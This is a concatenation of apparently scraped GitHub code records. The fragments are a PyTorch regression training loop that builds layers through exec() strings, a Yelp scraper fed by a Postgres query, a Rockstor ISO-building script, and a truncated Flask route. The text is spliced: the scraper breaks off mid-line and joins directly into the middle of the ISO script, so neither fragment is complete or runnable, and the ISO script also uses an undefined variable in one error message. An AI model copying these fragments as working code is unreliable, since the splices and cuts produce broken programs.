= nn.Sequential('\n                    for layer_num in range( len(dim_list) - 1 ):\n                        if layer_num == len(dim_list) - 2:\n                            make_model = make_model + 'nn.Linear(dim_list[' + str(layer_num) + '], dim_list[' + str(layer_num+1) + ']) )'\n                        else:\n                            # make_model = make_model + 'nn.Linear(dim_list[' + str(layer_num) + '], dim_list[' + str(layer_num+1) + ']), nn.LeakyReLU(),'\n                            make_model = make_model + 'nn.Linear(dim_list[' + str(layer_num) + '], dim_list[' + str(layer_num+1) + ']), nn.' + act + '(),'\n\n\n                    exec(make_model)\n\n                    exec('optimizer = optim.' + opt + '(model.parameters(), lr=learningRate )')\n\n                    batch_start = torch.arange(0, len(X_train), batch_size)\n\n                    # Hold the best model\n                    best_mse = np.inf  # init to infinity\n                    best_weights = None\n                    history = []\n                    history_train = []\n\n\n                    # for epoch in range(n_epochs):\n                    second_time = time.time()\n\n                    epoch = 0\n                    len_batch = len(X_train)\n                    while(1):\n\n                        model.train()\n\n                        for start in range(0,len_batch, batch_size):\n\n                            X_batch = X_train[start:start+batch_size] # even if the end index exceeds the length, slicing raises no error and just returns up to the last element\n                            y_batch = y_train[start:start+batch_size]\n                            # forward pass\n                            y_pred = model(X_batch).squeeze()\n\n                            before_loss = torch.mean( (y_pred/y_batch-1)**2 + (y_batch/y_pred-1)**2 + (y_pred-y_batch)**2 )\n\n                            loss = before_loss**(1/2)\n\n                            # backward pass\n                            optimizer.zero_grad()\n                            loss.backward()\n\n                            # update weights\n                            optimizer.step()\n\n                            loss = float(loss)\n\n                            history_train.append(loss)\n\n                        model.eval()\n                        y_pred = model(X_test).squeeze()\n                        #print(y_pred)\n\n                        before_loss = torch.mean( (y_pred/y_test-1)**2 + (y_test/y_pred-1)**2 + (y_pred-y_test)**2 )\n\n                        mse = before_loss**(1/2)\n\n                        mse = float(mse)\n\n                        history.append(mse)\n                        if mse < best_mse:\n                            best_mse = mse\n                            best_weights = copy.deepcopy(model.state_dict())\n\n\n                        if epoch % 100 == 0:\n                            # print('epoch: %5d' % epoch, 'test_loss: %.2f' % (mse), 'train_loss: %.2f' % (loss), 'est_time: %.2f' % (( ( epoch_time ) / (epoch+1) ) / 60 * (n_epochs-epoch) ) ,'min', \"epoch_time:\", epoch_time, 's')\n                            print_progress(epoch, mse, loss, second_time)\n                            # print('{:.6}'.format(val))\n                            # print(\"{:10.4f}\".format(x))\n\n                        # if (mse<10) or (str(mse)=='nan') or ( ( ( time.time()-second_time ) ) / 60 > 0.1 ):\n                        if (mse<10) or (str(mse)=='nan'):\n                            print_progress(epoch, mse, loss, second_time)\n                            break\n                        epoch = epoch + 1\n\n                    # restore model and return best accuracy\n                    model.load_state_dict(best_weights)\n                    # print(\"MSE: %.2f\" % best_mse)\n                    # print(\"RMSE: %.2f\" % np.sqrt(best_mse))\n                    save_my_work(model, f, xdata_name, opt, N, batch_size, learningRate, epoch, second_time, best_mse, mse, loss, init_time)\n\n                    print('finish--------------------------------------------------------------------------------------------------------------------------------------------------------')\n                    print('')\n\n        except:\n            # os.mkdir('/content/drive/MyDrive/0_318lab/SCMP_ML/')\n            save_my_work(model, f, xdata_name, opt, N, batch_size, learningRate, epoch, second_time, best_mse, mse, loss, init_time)\n\nf.close()\nprint('all done')\n# ----------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------------------------------------------------","repo_name":"ktikok/SCMP_ML","sub_path":".ipynb_checkpoints/predictingKineticE-checkpoint.py","file_name":"predictingKineticE-checkpoint.py","file_ext":"py","file_size_in_byte":9967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"12629476704","text":"import os\nimport 
csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import text\n\nload_dotenv()\n\nDATABASE_USERNAME = os.environ[\"DATABASE_USERNAME\"]\nDATABASE_PASSWORD = os.environ[\"DATABASE_PASSWORD\"]\nDATABASE_HOST = os.environ[\"DATABASE_HOST\"]\nDATABASE_PORT = os.environ[\"DATABASE_PORT\"]\nDATABASE_DATABASE = os.environ[\"DATABASE_DATABASE\"]\n\nSQLALCHEMY_DATABASE_URL = f\"postgresql://{DATABASE_USERNAME}:{DATABASE_PASSWORD}@{DATABASE_HOST}:{DATABASE_PORT}/{DATABASE_DATABASE}\"\n\nengine = create_engine(SQLALCHEMY_DATABASE_URL)\n\nsql = '''\n SELECT * FROM business;\n'''\nwith engine.connect().execution_options(autocommit=True) as conn:\n query = conn.execute(text(sql)) \ndf = pd.DataFrame(query.fetchall())\n\n\n\nrestaurant_attributes = []\n\nfor i in range(len(df)):\n response = requests.get(str(df[\"business_info\"][i][\"url\"]))\n soup = BeautifulSoup(response.content, \"lxml\")\n\n attributes = []\n for ii in range(0,4):\n try:\n attr = soup.find(\"yelp-react-root\").find(\"main\").find_all(\"span\", {\"class\": \"css-1p9ibgf\", \"data-font-weight\": \"semibold\"})[ii].decode_contents()\n if attr.startswith('\" % sys.argv[0])\n build_dir = sys.argv[1]\n print(\"Using %s as the iso build directory\" % build_dir)\n\n pkg_dir = '%s/Packages' % build_dir\n if (not os.path.isdir(pkg_dir)):\n sys.exit(\"Packages directory %s does not exist.\" % rpm_dir)\n new_pkg_dir = '%s/newrpms' % build_dir\n os.system(\"/usr/bin/mkdir -p %s\" % new_pkg_dir)\n\n install_deps()\n download_new_pkgs(pkg_dir, new_pkg_dir)\n rm_686_pkgs(new_pkg_dir)\n print (\"All i686 packages removed\")\n ttbl = '%s/TRANS.TBL' % pkg_dir\n shutil.copy(ttbl, new_pkg_dir)\n print (\"copied %s to %s\" % (ttbl, new_pkg_dir))\n bkp_dest = '/tmp/Packages'\n if (os.path.isdir(bkp_dest)):\n os.system('/usr/bin/rm -rf %s' % bkp_dest)\n print ('Removed %s' % bkp_dest)\n shutil.move(pkg_dir, bkp_dest)\n print (\"%s moved to %s\" % (pkg_dir, bkp_dest))\n shutil.move(new_pkg_dir, pkg_dir)\n print (\"%s moved to %s\" % (new_pkg_dir, pkg_dir))\n create_repo(build_dir)\n mkiso(build_dir)\n\nif __name__ == '__main__':\n main()\n","repo_name":"magicalyak/rockstor-iso","sub_path":"make_iso.py","file_name":"make_iso.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"33390549540","text":"from apps.home import blueprint\nfrom flask import Flask, render_template, request\nfrom flask_login import login_required\nfrom jinja2 import TemplateNotFound\n\napp = Flask(__name__)\napp.register_blueprint(blueprint)\n\n@blueprint.route('/index')\n@login_required\ndef index():\n\n return render_template('home/index.html', segment='index')\n\n\n@blueprint.route('/